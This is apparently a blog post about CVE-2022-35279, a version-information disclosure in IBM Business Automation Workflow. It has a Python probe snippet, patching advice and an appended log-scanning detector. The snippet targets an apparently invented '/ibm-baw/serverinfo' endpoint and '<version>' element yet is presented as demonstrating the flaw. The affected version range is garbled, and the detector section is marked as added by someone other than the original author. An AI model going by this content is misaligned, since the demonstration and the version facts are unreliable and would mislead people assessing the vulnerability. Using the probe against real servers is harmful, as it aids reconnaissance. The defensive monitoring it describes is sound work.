Hello everyone!

Today, we are going to discuss the newly discovered IBM Business Automation Workflow vulnerability, CVE-2022-35279. This vulnerability, assigned IBM X-Force ID 230537, affects multiple versions (18... to 22..1) of IBM Business Automation Workflow and could disclose sensitive version information to authenticated users. Such information could be used in further attacks against the vulnerable system.

Original References

- IBM Security Bulletin: https://www.ibm.com/support/pages/node/695611
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-35279

Exploit Details

The vulnerability is an information disclosure issue that could leak sensitive version information to authenticated users. This is a concern because the disclosed version details give an attacker exactly what is needed to select and tailor further targeted attacks against the affected system.

The vulnerability is notable as it affects a wide range of IBM Business Automation Workflow versions, meaning many installations of the product could potentially be at risk.

Here's a code snippet illustrating the version disclosure:

# Sample code snippet demonstrating the CVE-2022-35279 vulnerability
# Get version information from IBM Business Automation Workflow

import requests
from bs4 import BeautifulSoup

# Example URL for the IBM Business Automation Workflow server
url = "https://example.com/ibm-baw/serverinfo"
username = "your_username"
password = "your_password"

# Authenticate and send a request to obtain server information
response = requests.get(url, auth=(username, password), timeout=30)
response.raise_for_status()  # stop here on 401/403/5xx instead of parsing an error page

# Parse the response HTML content
soup = BeautifulSoup(response.content, "html.parser")

# Find the version element and extract the version information
version_element = soup.find("version")
if version_element is None:
    raise SystemExit("No <version> element found in the response")
version_info = version_element.get_text(strip=True)

print("IBM Business Automation Workflow Version:", version_info)

This code snippet sends an HTTP request to the IBM Business Automation Workflow server, authenticates with the given username and password, and retrieves the server information. It then uses the BeautifulSoup library to parse the response HTML, locate the <version> element, and extract the version information from that element. The disclosed version information can then be printed or saved for further analysis or use in an attack.

Mitigation

IBM has released patches and recommendations for addressing the issue in affected IBM Business Automation Workflow versions. It is advised to review the IBM Security Bulletin and apply the necessary patches or updates as soon as possible.

Additionally, access to sensitive information should be restricted to only authorized and necessary personnel. Enforcing strict access control policies and monitoring user activities can help minimize the potential impact of information disclosure vulnerabilities like this one.
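To show what "monitoring user activities" can look like in practice, here is an added example (not from the IBM bulletin and not part of the original post) that scans web server access logs for successful fetches of a version-information endpoint by users who are not on an operator allowlist. The log lines are constructed for the example, the endpoint path is the one used in the snippet above, and the allowlist, the path set and the combined log format are assumptions you would adjust for your own deployment.

```python
import re
from collections import defaultdict

# Constructed sample access log lines in Apache/IBM HTTP Server "combined"
# style. These are made up for this example, not real BAW server logs.
SAMPLE_LOG = """\
10.0.0.5 - alice [03/Nov/2022:20:15:01 +0000] "GET /ibm-baw/serverinfo HTTP/1.1" 200 512
10.0.0.5 - alice [03/Nov/2022:20:15:05 +0000] "GET /ProcessPortal/ HTTP/1.1" 200 8192
10.0.0.9 - bob [03/Nov/2022:20:16:10 +0000] "GET /ibm-baw/serverinfo HTTP/1.1" 200 512
10.0.0.9 - bob [03/Nov/2022:20:16:11 +0000] "GET /ibm-baw/serverinfo HTTP/1.1" 200 512
10.0.0.9 - bob [03/Nov/2022:20:16:12 +0000] "GET /ibm-baw/serverinfo HTTP/1.1" 200 512
10.0.0.7 - - [03/Nov/2022:20:17:00 +0000] "GET /ibm-baw/serverinfo HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Hypothetical: paths that expose build/version details. The first entry is
# the path used in the snippet earlier in this post; add the real endpoints
# for your deployment.
VERSION_INFO_PATHS = {"/ibm-baw/serverinfo"}

# Hypothetical allowlist of operators who legitimately need version details.
ALLOWED_USERS = {"alice"}


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_version_probes(log_text, allowed_users=ALLOWED_USERS, paths=VERSION_INFO_PATHS):
    """Flag authenticated users, not on the allowlist, who successfully fetched a version-info path.

    Returns a list of findings sorted by hit count (descending), each a dict with
    the user name, the sorted list of source IPs seen, and the number of hits.
    """
    hits = defaultdict(lambda: {"count": 0, "ips": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # Only a 2xx response actually discloses the version; 401/403 attempts do not.
        if not 200 <= rec["status"] < 300:
            continue
        # Compare the path without any query string.
        if rec["path"].split("?", 1)[0] not in paths:
            continue
        user = rec["user"]
        # "-" means no authenticated user was recorded; allowlisted operators are expected.
        if user == "-" or user in allowed_users:
            continue
        hits[user]["count"] += 1
        hits[user]["ips"].add(rec["ip"])
    findings = [
        {"user": u, "count": h["count"], "ips": sorted(h["ips"])}
        for u, h in hits.items()
    ]
    return sorted(findings, key=lambda f: (-f["count"], f["user"]))


if __name__ == "__main__":
    for f in find_version_probes(SAMPLE_LOG):
        print(f"{f['user']}: {f['count']} version-info fetch(es) from {', '.join(f['ips'])}")
```

On the constructed sample this reports only `bob`, who pulled the version endpoint three times without being on the allowlist; `alice` is allowlisted and the unauthenticated 401 attempt is ignored because nothing was disclosed. Feeding the real access log in and alerting on non-zero findings is a cheap compensating control while the IBM patch is being rolled out.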

Stay vigilant and always keep your systems up-to-date!

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:18:00 UTC